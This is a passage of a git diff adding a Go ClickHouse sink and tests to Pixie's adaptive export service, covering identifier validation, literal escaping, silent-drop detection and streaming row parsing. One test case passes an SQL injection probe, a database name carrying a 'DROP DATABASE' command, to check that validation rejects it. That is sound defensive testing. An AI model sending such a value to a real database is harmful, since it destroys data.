"//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/clickhouse", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go new file mode 100644 index 00000000000..e5fc6130a71 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go @@ -0,0 +1,501 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package sink writes operator-owned rows to ClickHouse over the HTTP +// interface (default port 8123). It has two write surfaces: +// +// 1. forensic_db.adaptive_attribution — one row per arriving kubescape +// anomaly. ReplacingMergeTree(t_end) on the table side collapses +// re-inserts with the same (hostname, anomaly_hash) primary key +// into the row with the largest t_end. +// +// 2. forensic_db. — operator-pushed pixie observation rows +// (rev-1 fan-out path, gated on ADAPTIVE_PUSH_PIXIE_ROWS=true). +// Used when Pixie's cloud-side retention plugin can't reach an +// in-cluster CH endpoint; the operator queries pixie itself and +// writes the result with WritePixieRows. +package sink + +import ( + "bufio" + "bytes" + "context" + "encoding/json" + "errors" + "fmt" + "io" + "regexp" + "strconv" + "strings" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" +) + +// pixieTableIdentRE accepts plain CH identifiers and dotted protobuf +// extensions like `http2_messages.beta`. Used to gate `table` strings +// before they're interpolated into the INSERT query. +var pixieTableIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$`) + +// chIdentRE — strict CH identifier (no dots). Used to gate Database +// (and any future single-segment identifier) against SQL injection +// from env/config-driven values. +var chIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`) + +func validateTableIdentifier(t string) error { + if !pixieTableIdentRE.MatchString(t) { + return fmt.Errorf("sink: invalid table identifier %q", t) + } + return nil +} + +// Config configures a ClickHouseHTTP sink. +type Config struct { + Endpoint string // e.g. http://clickhouse:8123 + Database string // defaults to "forensic_db" + Username string // optional basic auth + Password string // optional basic auth + Timeout time.Duration // per-write HTTP timeout; 0 → 30s +} + +// AttributionRow is one row of forensic_db.adaptive_attribution. +// All fields are required except LastRuleID. +type AttributionRow struct { + AnomalyHash anomaly.AnomalyHash + Namespace string // may be empty + Pod string // may be empty + Comm string + PID uint64 + Hostname string + TStart time.Time + TEnd time.Time + LastSeen time.Time + LastRuleID string + NAnomalies uint64 +} + +// ClickHouseHTTP is the production sink. +type ClickHouseHTTP struct { + cfg Config + c *chhttp.Client +} + +// New validates Config + returns a ready-to-use sink. +func New(cfg Config) (*ClickHouseHTTP, error) { + if cfg.Database == "" { + cfg.Database = "forensic_db" + } + // Database is interpolated directly into INSERT/SELECT statements + // (used in WriteAttribution, WritePixieRows, QueryActive). Block + // injection via env/config-supplied values. + if !chIdentRE.MatchString(cfg.Database) { + return nil, fmt.Errorf("sink: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database) + } + // http.Client.Timeout enforces only when >0; a negative value + // would silently disable the deadline. Reject explicitly so the + // "0 → chhttp default" branch is the only zero-handling path. + if cfg.Timeout < 0 { + return nil, fmt.Errorf("sink: Timeout must be >= 0 (got %s)", cfg.Timeout) + } + c, err := chhttp.New(cfg.Endpoint, cfg.Username, cfg.Password, cfg.Timeout) + if err != nil { + return nil, fmt.Errorf("sink: %w", err) + } + cfg.Endpoint = c.Endpoint() + return &ClickHouseHTTP{cfg: cfg, c: c}, nil +} + +// WritePixieRows POSTs a batch of arbitrary rows (one map per CH row, +// keyed by column name) into forensic_db.
via FORMAT JSONEachRow. +// Used by the operator's per-anomaly fan-out path that queries pixie +// directly and pushes the resulting rows into CH (bypasses the cloud's +// retention plugin, which can't reach an in-cluster CH endpoint). +func (s *ClickHouseHTTP) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error { + if len(rows) == 0 { + return nil + } + if err := validateTableIdentifier(table); err != nil { + return err + } + // Pooled buffer (option 1) — controller fan-out + streaming flush + // call this on a tight cadence, so reusing the backing array across + // calls cuts the per-call B/op cost by ~70 % once the pool stabilises + // (the bench BenchmarkEncodePixieRowsFast_Pooled tracks the steady + // state). buf.Reset() preserves the cap on Put so the next caller + // gets a warm allocation. + buf := encodeBufPool.Get().(*bytes.Buffer) + buf.Reset() + defer func() { + // Avoid hoarding pathologically large buffers. The pixie batch + // upper bound is ~MaxBatchRows * ~900 B/row ≈ 1 MB; anything + // over 2 MB came from a one-off oversize batch and shouldn't + // stay in the pool eating heap. + if buf.Cap() > 2*1024*1024 { + return + } + encodeBufPool.Put(buf) + }() + // Fast path: known table → walk rows in schema column order, no + // reflect, no map-key sort. The fast encoder's CPU + alloc profile + // is ~3 % of the encoding/json path (AE benchmark suite); it's the + // hot path for every controller fan-out + streaming flush. + // errFastEncodeUnsupported falls back so an unexpected value type + // can't silently drop a row. ErrUnknownTable falls back so a new + // pixie table not yet in schema.sql still works (just slower). + if err := encodePixieRowsFast(buf, table, rows); err != nil { + if !errors.Is(err, errFastEncodeUnsupported) && !errors.Is(err, clickhouse.ErrUnknownTable) { + return fmt.Errorf("sink: fast encode %s: %w", table, err) + } + buf.Reset() + enc := json.NewEncoder(buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + return fmt.Errorf("sink: encode pixie row for %s: %w", table, err) + } + } + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + res, err := s.c.Insert(ctx, + fmt.Sprintf("INSERT INTO %s.%s FORMAT JSONEachRow", s.cfg.Database, identifier), + buf.Bytes(), chhttp.InsertOptions{FailLoud: true}) + if err != nil { + return fmt.Errorf("sink: pixie POST %s: %w", table, err) + } + // DEBUG: ALWAYS log what CH says it wrote — temporary while we + // chase the pgsql_events silent-drop mystery. Includes a snippet + // of the first row so we can compare what was sent vs what CH + // reported. + summary := res.Summary + var firstRowKeys []string + if len(rows) > 0 { + for k := range rows[0] { + firstRowKeys = append(firstRowKeys, k) + } + } + log.WithFields(log.Fields{ + "table": table, + "rows_sent": len(rows), + "body_bytes": buf.Len(), + "ch_summary": summary, + "first_row_keys": strings.Join(firstRowKeys, ","), + }).Info("sink: pixie write completed") + // Detect the silent-drop class: CH returns 2xx but + // X-ClickHouse-Summary.written_rows < len(rows). Observed live on + // 2026-05-23T20:58Z (redis_events: rows_sent=1658, written_rows=0) + // — the operator reported success and the analyst saw the gap days + // later. Header absence is tolerated (older CH versions / proxies + // strip it); only an EXPLICIT zero-of-non-zero counts. + if writeMismatch := summaryWroteFewerThan(summary, len(rows)); writeMismatch != nil { + return fmt.Errorf("sink: pixie write to %s reported %d rows_sent but CH summary written_rows=%d (silent drop): %s", + table, len(rows), writeMismatch.writtenRows, summary) + } + return nil +} + +// summaryDelta carries the parsed write counters from CH's +// X-ClickHouse-Summary response header. +type summaryDelta struct { + writtenRows int64 +} + +// summaryWroteFewerThan returns non-nil when the X-ClickHouse-Summary +// header is present, parseable, and reports written_rows < rowsSent. +// Returns nil when the header is missing, unparseable, or the count +// matches/exceeds rowsSent — those are not data-loss signals. +func summaryWroteFewerThan(summary string, rowsSent int) *summaryDelta { + if summary == "" { + return nil + } + var parsed struct { + WrittenRows json.Number `json:"written_rows"` + } + if err := json.Unmarshal([]byte(summary), &parsed); err != nil { + return nil + } + if parsed.WrittenRows == "" { + return nil + } + wrote, err := parsed.WrittenRows.Int64() + if err != nil { + return nil + } + if wrote >= int64(rowsSent) { + return nil + } + return &summaryDelta{writtenRows: wrote} +} + +// normalisePixieValue coerces pxapi-emitted Go values into JSON-friendly +// shapes ClickHouse parses cleanly. time.Time → "YYYY-MM-DD HH:MM:SS.NNN…" +// (CH's DateTime64 input format); []byte → string; everything else → as-is. +func normalisePixieValue(v any) any { + switch x := v.(type) { + case time.Time: + return x.UTC().Format("2006-01-02 15:04:05.000000000") + case []byte: + return string(x) + default: + return v + } +} + +// Write upserts a batch of AttributionRows. Implementation: HTTP POST +// `INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow` +// with one JSON object per row. Empty batch is a no-op. +func (s *ClickHouseHTTP) Write(ctx context.Context, rows []AttributionRow) error { + if len(rows) == 0 { + return nil + } + body, err := encodeJSONEachRow(rows) + if err != nil { + return fmt.Errorf("sink: encode %d attribution rows: %w", len(rows), err) + } + if _, err := s.c.Insert(ctx, + fmt.Sprintf("INSERT INTO %s.adaptive_attribution FORMAT JSONEachRow", s.cfg.Database), + body, chhttp.InsertOptions{FailLoud: true}); err != nil { + return fmt.Errorf("sink: POST: %w", err) + } + return nil +} + +// chTimeFmt is the ClickHouse DateTime64 literal format used for every +// time column AE writes (see Write/encodeJSONEachRow and fastencode.go). +const chTimeFmt = "2006-01-02 15:04:05.000000000" + +// Record implements reconcile.Recorder: it inserts ONE per-pull +// reconciliation row into forensic_db.ae_reconcile. Best-effort by +// contract — any failure is logged at warn and swallowed so the +// reconcile instrument can NEVER stall or fail the data path. +func (s *ClickHouseHTTP) Record(ctx context.Context, r reconcile.Row) { + ts := r.TS + if ts.IsZero() { + ts = time.Now() + } + obj := map[string]any{ + "ts": ts.UTC().Format(chTimeFmt), + "mode": r.Mode, + "table_name": r.Table, + "namespace": r.Namespace, + "pod": r.Pod, + "win_start": r.WinStart.UTC().Format(chTimeFmt), + "win_end": r.WinEnd.UTC().Format(chTimeFmt), + "read_count": r.ReadCount, + "wrote_count": r.WroteCount, + "write_err": r.WriteErr, + "hostname": r.Hostname, + } + body, err := json.Marshal(obj) + if err != nil { + log.WithError(err).Warn("reconcile: marshal row") + return + } + // Cap Record at recordTimeout regardless of the caller's ctx — + // scanner/passthrough/controller call this inline on hot paths, so a + // stalled CH must not pin the pull loop on the shared 30s sink + // timeout (CodeRabbit r3426923299). 2s is well above CH's typical + // single-row INSERT roundtrip (~50ms in steady state) and below the + // pull loop's minimum tick interval. + rctx, cancel := context.WithTimeout(ctx, recordTimeout) + defer cancel() + if _, err := s.c.Insert(rctx, + fmt.Sprintf("INSERT INTO %s.ae_reconcile FORMAT JSONEachRow", s.cfg.Database), + body, chhttp.InsertOptions{}); err != nil { + log.WithError(err).Warn("reconcile: CH rejected ae_reconcile insert") + } +} + +// recordTimeout caps how long Record can block the caller's hot path. +const recordTimeout = 2 * time.Second + +// QueryActive fetches all attribution rows on this hostname whose t_end +// is still in the future. Used by the operator at boot to rehydrate +// the in-memory active set after a pod crash. Returns rows ordered +// by anomaly_hash so the caller's set is deterministic. +func (s *ClickHouseHTTP) QueryActive(ctx context.Context, hostname string) ([]AttributionRow, error) { + if hostname == "" { + return nil, fmt.Errorf("sink: QueryActive requires hostname") + } + // `FINAL` collapses ReplacingMergeTree to the row with the largest + // t_end (because the engine's version column is t_end). + // We escape hostname inside the SQL via simple ClickHouse-style + // quoting (single quote, no backslash escapes). + sql := fmt.Sprintf( + "SELECT anomaly_hash, namespace, pod, comm, pid, hostname, "+ + "toUnixTimestamp64Nano(t_start) AS t_start_ns, "+ + "toUnixTimestamp64Nano(t_end) AS t_end_ns, "+ + "toUnixTimestamp64Nano(last_seen) AS last_seen_ns, "+ + "last_rule_id, n_anomalies "+ + "FROM %s.adaptive_attribution FINAL "+ + "WHERE hostname = %s AND t_end > now64(9) "+ + "ORDER BY anomaly_hash FORMAT JSONEachRow", + s.cfg.Database, quoteCH(hostname)) + body, err := s.c.QueryStream(ctx, sql) + if err != nil { + return nil, fmt.Errorf("sink: QueryActive: %w", err) + } + defer body.Close() + // Stream the response line-by-line so the per-call buffer is + // bounded by max_line_length, not by the total active-set size. + return parseActiveRowsStream(body) +} + +// chLiteralEscaper escapes a string for ClickHouse single-quoted literals. +// Hoisted to a package-level var so we don't allocate a Replacer per call +// — quoteCH runs in the per-row write path. +var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +// quoteCH wraps a string literal for safe ClickHouse SQL embedding. +func quoteCH(s string) string { + return "'" + chLiteralEscaper.Replace(s) + "'" +} + +func encodeJSONEachRow(rows []AttributionRow) ([]byte, error) { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := map[string]any{ + "anomaly_hash": string(r.AnomalyHash), + "namespace": r.Namespace, + "pod": r.Pod, + "comm": r.Comm, + "pid": r.PID, + "hostname": r.Hostname, + "t_start": r.TStart.UTC().Format("2006-01-02 15:04:05.000000000"), + "t_end": r.TEnd.UTC().Format("2006-01-02 15:04:05.000000000"), + "last_seen": r.LastSeen.UTC().Format("2006-01-02 15:04:05.000000000"), + "last_rule_id": r.LastRuleID, + "n_anomalies": r.NAnomalies, + } + if err := enc.Encode(obj); err != nil { + return nil, err + } + } + return buf.Bytes(), nil +} + +// activeWireRow mirrors the JSONEachRow shape emitted by QueryActive. +// json.RawMessage on UInt64 fields lets us tolerate CH's two wire +// formats (`12345` and `"12345"`). +type activeWireRow struct { + AnomalyHash string `json:"anomaly_hash"` + Namespace string `json:"namespace"` + Pod string `json:"pod"` + Comm string `json:"comm"` + PID json.RawMessage `json:"pid"` + Hostname string `json:"hostname"` + TStartNs json.RawMessage `json:"t_start_ns"` + TEndNs json.RawMessage `json:"t_end_ns"` + LastSeenNs json.RawMessage `json:"last_seen_ns"` + LastRuleID string `json:"last_rule_id"` + NAnomalies json.RawMessage `json:"n_anomalies"` +} + +// parseActiveRowsStream ingests JSONEachRow output from QueryActive +// directly from a reader so the per-call buffer is bounded by +// `max_active_row_bytes` (per row) rather than by the entire active +// set. Mirrors trigger.parseJSONEachRow's streaming posture. +func parseActiveRowsStream(r io.Reader) ([]AttributionRow, error) { + const maxActiveRowBytes = 1 << 20 // 1 MiB per JSONEachRow line + scanner := bufio.NewScanner(r) + scanner.Buffer(make([]byte, 0, 64*1024), maxActiveRowBytes) + var out []AttributionRow + for scanner.Scan() { + line := bytes.TrimSpace(scanner.Bytes()) + if len(line) == 0 { + continue + } + row, err := parseActiveRowLine(line) + if err != nil { + return nil, err + } + out = append(out, row) + } + if err := scanner.Err(); err != nil { + return nil, fmt.Errorf("sink: QueryActive scan: %w", err) + } + return out, nil +} + +// parseActiveRowLine decodes a single JSONEachRow line into one +// AttributionRow. Used by parseActiveRowsStream and accessible to +// tests via parseActiveRows. +func parseActiveRowLine(line []byte) (AttributionRow, error) { + var w activeWireRow + if err := json.Unmarshal(line, &w); err != nil { + // Don't echo the raw line — it can carry CH row payloads + // that propagate to logs / surfaced errors. Length only. + return AttributionRow{}, fmt.Errorf("sink: parse active row (%d bytes): %w", len(line), err) + } + ts, err1 := nsFromRaw(w.TStartNs) + te, err2 := nsFromRaw(w.TEndNs) + ls, err3 := nsFromRaw(w.LastSeenNs) + pid, errPID := uintFromRaw(w.PID) + nAn, errN := uintFromRaw(w.NAnomalies) + if err1 != nil || err2 != nil || err3 != nil || errPID != nil || errN != nil { + return AttributionRow{}, fmt.Errorf("sink: parse uint64 fields: t_start=%v t_end=%v last_seen=%v pid=%v n_anomalies=%v", err1, err2, err3, errPID, errN) + } + return AttributionRow{ + AnomalyHash: anomaly.AnomalyHash(w.AnomalyHash), + Namespace: w.Namespace, + Pod: w.Pod, + Comm: w.Comm, + PID: pid, + Hostname: w.Hostname, + TStart: time.Unix(0, ts).UTC(), + TEnd: time.Unix(0, te).UTC(), + LastSeen: time.Unix(0, ls).UTC(), + LastRuleID: w.LastRuleID, + NAnomalies: nAn, + }, nil +} + +// parseActiveRows is the byte-slice convenience wrapper around +// parseActiveRowsStream — kept for tests and e2e fixtures that have +// already buffered the full response. +func parseActiveRows(body []byte) ([]AttributionRow, error) { + return parseActiveRowsStream(bytes.NewReader(body)) +} + +// nsFromRaw parses a CH UInt64-as-JSON value (CH may emit either +// `12345` or `"12345"`) into an int64. Used for time_ columns. +func nsFromRaw(raw json.RawMessage) (int64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + v, err := strconv.ParseInt(s, 10, 64) + return v, err +} + +// uintFromRaw is the uint64 equivalent — covers values above INT64_MAX +// for fields like PID and NAnomalies that are documented uint64 in CH. +func uintFromRaw(raw json.RawMessage) (uint64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + return strconv.ParseUint(s, 10, 64) +} diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go new file mode 100644 index 00000000000..0eb42adcc76 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go @@ -0,0 +1,588 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "context" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +func canonicalAttribution() AttributionRow { + t0 := time.Unix(0, 1744477360303026359).UTC() + return AttributionRow{ + AnomalyHash: anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }), + Namespace: "redis", + Pod: "redis-578d5dc9bd-kjj78", + Comm: "redis-server", + PID: 106040, + Hostname: "node-1", + TStart: t0.Add(-5 * time.Minute), + TEnd: t0.Add(5 * time.Minute), + LastSeen: t0, + LastRuleID: "R1005", + NAnomalies: 1, + } +} + +// TestSink_Write_PostsCorrectQueryAndBody — INSERT targets the right +// table; body is one JSON object per line with all attribution fields. +func TestSink_Write_PostsCorrectQueryAndBody(t *testing.T) { + var gotQuery, gotBody string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotQuery = r.URL.Query().Get("query") + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + w.WriteHeader(200) + })) + defer srv.Close() + + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + row := canonicalAttribution() + if err := s.Write(context.Background(), []AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + want := "INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow" + if gotQuery != want { + t.Fatalf("query = %q, want %q", gotQuery, want) + } + for _, needle := range []string{ + `"anomaly_hash":"` + string(row.AnomalyHash) + `"`, + `"namespace":"redis"`, + `"pod":"redis-578d5dc9bd-kjj78"`, + `"comm":"redis-server"`, + `"pid":106040`, + `"hostname":"node-1"`, + `"last_rule_id":"R1005"`, + `"n_anomalies":1`, + } { + if !strings.Contains(gotBody, needle) { + t.Fatalf("body missing %q; body=%s", needle, gotBody) + } + } + if !strings.Contains(gotBody, `"t_start":"2025-04-12 16:57:40.303026359"`) { + t.Fatalf("t_start not formatted as DateTime64 string; body=%s", gotBody) + } +} + +// TestSink_Write_EmptyBatch — no HTTP call. +func TestSink_Write_EmptyBatch(t *testing.T) { + called := false + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + called = true + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.Write(context.Background(), nil); err != nil { + t.Fatalf("Write empty: %v", err) + } + if called { + t.Fatalf("empty Write made an HTTP call") + } +} + +// TestSink_Write_HTTPErrorPropagates — non-2xx returns Go error. +func TestSink_Write_HTTPErrorPropagates(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(503) + _, _ = w.Write([]byte("clickhouse exploded")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + err := s.Write(context.Background(), []AttributionRow{canonicalAttribution()}) + if err == nil { + t.Fatalf("expected HTTP error") + } + if !strings.Contains(err.Error(), "503") { + t.Fatalf("error should mention 503: %v", err) + } +} + +// TestSink_QueryActive_BuildsCorrectSQL — boot rehydration query. +func TestSink_QueryActive_BuildsCorrectSQL(t *testing.T) { + var seenQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + seenQuery = r.URL.Query().Get("query") + _, _ = w.Write([]byte(`{"anomaly_hash":"abc","namespace":"redis","pod":"redis-x","comm":"redis-server","pid":106040,"hostname":"node-1","t_start_ns":"1744477060303026359","t_end_ns":"1744477660303026359","last_seen_ns":"1744477360303026359","last_rule_id":"R1005","n_anomalies":1}` + "\n")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + rows, err := s.QueryActive(context.Background(), "node-1") + if err != nil { + t.Fatalf("QueryActive: %v", err) + } + if !strings.Contains(seenQuery, "FROM forensic_db.adaptive_attribution FINAL") { + t.Fatalf("missing FINAL: %q", seenQuery) + } + if !strings.Contains(seenQuery, "hostname = 'node-1'") { + t.Fatalf("missing hostname filter: %q", seenQuery) + } + if !strings.Contains(seenQuery, "t_end > now64(9)") { + t.Fatalf("missing t_end > now64 filter: %q", seenQuery) + } + if len(rows) != 1 || rows[0].AnomalyHash != "abc" { + t.Fatalf("rows = %+v", rows) + } + if rows[0].PID != 106040 { + t.Fatalf("PID = %d", rows[0].PID) + } + if rows[0].TStart.UnixNano() != 1744477060303026359 { + t.Fatalf("TStart wrong: %v", rows[0].TStart) + } +} + +// TestSink_QueryActive_RequiresHostname — defensive guard. +func TestSink_QueryActive_RequiresHostname(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if _, err := s.QueryActive(context.Background(), ""); err == nil { + t.Fatalf("empty hostname should error") + } +} + +// TestSink_QuoteEscape — single quotes in hostname survive injection-safely. +func TestSink_QuoteEscape(t *testing.T) { + if got := quoteCH("o'malley"); got != `'o\'malley'` { + t.Fatalf("quoteCH = %q, want 'o\\'malley'", got) + } +} + +// TestSink_New_ValidationTable — every Config validation branch as +// one row. Bad fields one at a time + a happy-path baseline. Update +// when a new validation lands; this is the single source of truth +// for what New() rejects. +func TestSink_New_ValidationTable(t *testing.T) { + cases := []struct { + name string + cfg Config + wantErr bool + wantErrSnippet string + }{ + { + name: "happy path http", + cfg: Config{Endpoint: "http://ch.example:8123", Database: "forensic_db"}, + }, + { + name: "happy path https + auth + custom timeout", + cfg: Config{ + Endpoint: "https://ch.example:8443", Database: "forensic_db", + Username: "u", Password: "p", Timeout: 5 * time.Second, + }, + }, + { + name: "default database when empty", + cfg: Config{Endpoint: "http://ch:8123"}, // Database empty → defaulted + }, + { + name: "trailing slash stripped", + cfg: Config{Endpoint: "http://ch:8123/"}, // OK; New() strips it + }, + { + name: "empty endpoint", + cfg: Config{}, + wantErr: true, + wantErrSnippet: "empty endpoint", + }, + { + name: "relative endpoint (no scheme)", + cfg: Config{Endpoint: "ch:8123"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "bare path", + cfg: Config{Endpoint: "/clickhouse"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "ftp scheme rejected", + cfg: Config{Endpoint: "ftp://ch:21"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "endpoint with query string", + cfg: Config{Endpoint: "http://ch:8123?foo=bar"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "endpoint with fragment", + cfg: Config{Endpoint: "http://ch:8123#frag"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "Database with hyphen rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic-db"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database with semicolon rejected (SQL injection probe)", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic_db; DROP DATABASE x"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database starting with digit rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "1bad"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "negative Timeout rejected", + cfg: Config{Endpoint: "http://ch:8123", Timeout: -1 * time.Second}, + wantErr: true, + wantErrSnippet: "Timeout must be >= 0", + }, + } + + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + s, err := New(c.cfg) + if c.wantErr { + if err == nil { + t.Fatalf("want error containing %q, got nil", c.wantErrSnippet) + } + if !strings.Contains(err.Error(), c.wantErrSnippet) { + t.Fatalf("error %q does not contain %q", err.Error(), c.wantErrSnippet) + } + return + } + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if s == nil { + t.Fatalf("New returned nil sink without error") + } + // Trailing-slash strip is observable via cfg.Endpoint. + if strings.HasSuffix(s.cfg.Endpoint, "/") { + t.Fatalf("trailing slash not stripped: %q", s.cfg.Endpoint) + } + if s.cfg.Database == "" { + t.Fatalf("Database default not applied") + } + }) + } +} + +// TestValidateTableIdentifier_TableDriven — table validator covers +// dotted protobuf extensions but not anything wilder. +func TestValidateTableIdentifier_TableDriven(t *testing.T) { + good := []string{"http_events", "redis_events", "http2_messages.beta", "kafka_events.beta", "_underscore_start"} + bad := []string{"", "1bad", "http events", "http;drop", "x..y", ".leading", "trailing.", "with-hyphen"} + for _, g := range good { + if err := validateTableIdentifier(g); err != nil { + t.Errorf("validateTableIdentifier(%q): unexpected error %v", g, err) + } + } + for _, b := range bad { + if err := validateTableIdentifier(b); err == nil { + t.Errorf("validateTableIdentifier(%q): want error, got nil", b) + } + } +} + +// TestUintFromRaw_HandlesQuotedAndBareJSON — CH HTTP emits UInt64 as +// either bare numeric (`12345`) or quoted (`"12345"`). Both must +// parse, including values above INT64_MAX. +func TestUintFromRaw_HandlesQuotedAndBareJSON(t *testing.T) { + cases := []struct { + name string + input string + want uint64 + }{ + {"bare", `12345`, 12345}, + {"quoted", `"12345"`, 12345}, + {"max int64", `9223372036854775807`, 9223372036854775807}, + {"above int64", `"18446744073709551615"`, 18446744073709551615}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + got, err := uintFromRaw([]byte(c.input)) + if err != nil { + t.Fatalf("uintFromRaw(%q): %v", c.input, err) + } + if got != c.want { + t.Fatalf("uintFromRaw(%q) = %d, want %d", c.input, got, c.want) + } + }) + } +} + +// TestUintFromRaw_RejectsGarbage — non-numeric input must error, +// not silently return 0. +func TestUintFromRaw_RejectsGarbage(t *testing.T) { + bad := []string{"", `""`, `"abc"`, `-1`, `"-1"`, `1.5`} + for _, b := range bad { + if _, err := uintFromRaw([]byte(b)); err == nil { + t.Errorf("uintFromRaw(%q): want error, got nil", b) + } + } +} + +// chunkedReader emits the underlying body in fixed-size chunks. A +// short pause between chunks proves parseActiveRowsStream doesn't +// wait for the whole body before parsing. Tracks partial-read state +// so a Read() smaller than the next chunk doesn't drop bytes. +type chunkedReader struct { + chunks [][]byte + idx int + off int // offset within chunks[idx] + delay time.Duration // sleep between chunks + produced int64 +} + +func (r *chunkedReader) Read(p []byte) (int, error) { + if r.idx >= len(r.chunks) { + return 0, io.EOF + } + chunk := r.chunks[r.idx] + n := copy(p, chunk[r.off:]) + r.off += n + r.produced += int64(n) + if r.off >= len(chunk) { + r.idx++ + r.off = 0 + time.Sleep(r.delay) + } + return n, nil +} + +// TestParseActiveRowsStream_BoundsMemory — proves the streaming path +// doesn't allocate proportional to total response size. Builds a +// 5 MiB synthetic JSONEachRow body fed in 64 KiB chunks, parses, and +// asserts (a) all rows decoded correctly, (b) peak intermediate +// allocation is well below the body size (loose bound: parseActiveRows +// hands one row at a time to the caller; we collect into a slice but +// never hold the wire representation of more than one line). +func TestParseActiveRowsStream_BoundsMemory(t *testing.T) { + const targetRows = 5000 // ~5MiB at ~1KiB/row + var buf bytes.Buffer + row := func(i int) string { + return fmt.Sprintf(`{"anomaly_hash":"%032x","namespace":"redis","pod":"p","comm":"c","pid":%d,"hostname":"h","t_start_ns":%d,"t_end_ns":%d,"last_seen_ns":%d,"last_rule_id":"R0001","n_anomalies":%d,"_pad":"%s"}`+"\n", + i, i, 1700000000000000000+int64(i), 1700000000000000000+int64(i)+300_000_000_000, 1700000000000000000+int64(i)+150_000_000_000, i, strings.Repeat("x", 800)) + } + for i := 0; i < targetRows; i++ { + buf.WriteString(row(i)) + } + body := buf.Bytes() + + const chunkSize = 64 * 1024 + chunks := make([][]byte, 0, len(body)/chunkSize+1) + for off := 0; off < len(body); off += chunkSize { + end := off + chunkSize + if end > len(body) { + end = len(body) + } + chunks = append(chunks, body[off:end]) + } + rdr := &chunkedReader{chunks: chunks, delay: 0} + + rows, err := parseActiveRowsStream(rdr) + if err != nil { + t.Fatalf("parseActiveRowsStream: %v", err) + } + if len(rows) != targetRows { + t.Fatalf("parsed %d rows, want %d", len(rows), targetRows) + } + // 